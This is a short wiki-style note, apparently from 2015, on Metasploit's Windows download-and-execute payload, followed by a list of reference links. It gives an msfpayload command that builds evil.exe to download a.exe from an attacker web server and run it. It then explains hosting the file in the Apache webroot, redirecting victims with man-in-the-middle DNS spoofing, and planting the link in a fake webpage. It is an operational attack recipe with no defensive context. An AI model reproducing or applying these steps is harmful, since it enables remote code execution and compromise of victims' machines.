"WINDOWS/DOWNLOAD_EXEC"
http://www.governmentsecurity.org/forum/topic/18370-download-and-exec-payload/ http://www.r00tsec.com/2013/02/howto-single-staged-stagers-payload-of.html http://www.room362.com/blog/2011/06/26/metasploit-payloads-explained-part-1/ http://www.thegreycorner.com/2010/05/download-and-execute-script-shellcode.html
"generate payload" sudo msfpayload windows/download_exec url="http//192.168.1.68/a.exe" X > evil.exe "port payload to apache webroot" cp evil.exe /var/www/evil.exe then use "MitM+DNS_spoof" to point to apache evil.exe, thats going to make a.exe in C:\windows\a.exe and execute it Remark: clone 'firefox_xpi priv8.sh module' way to inject the URL into the HTML fake webpage
"SERVER SIDE EXPLOITATION" send a url link to client
http://pt.scribd.com/doc/176198248/Back-Track-Tutorials#scribd
Anonymous
You seem to have CSS turned off. Please don't fill out this field.
http://www.governmentsecurity.org/forum/topic/18370-download-and-exec-payload/
http://www.r00tsec.com/2013/02/howto-single-staged-stagers-payload-of.html
http://www.room362.com/blog/2011/06/26/metasploit-payloads-explained-part-1/
http://www.thegreycorner.com/2010/05/download-and-execute-script-shellcode.html
http://pt.scribd.com/doc/176198248/Back-Track-Tutorials#scribd
Last edit: pedro ubuntu 2015-01-04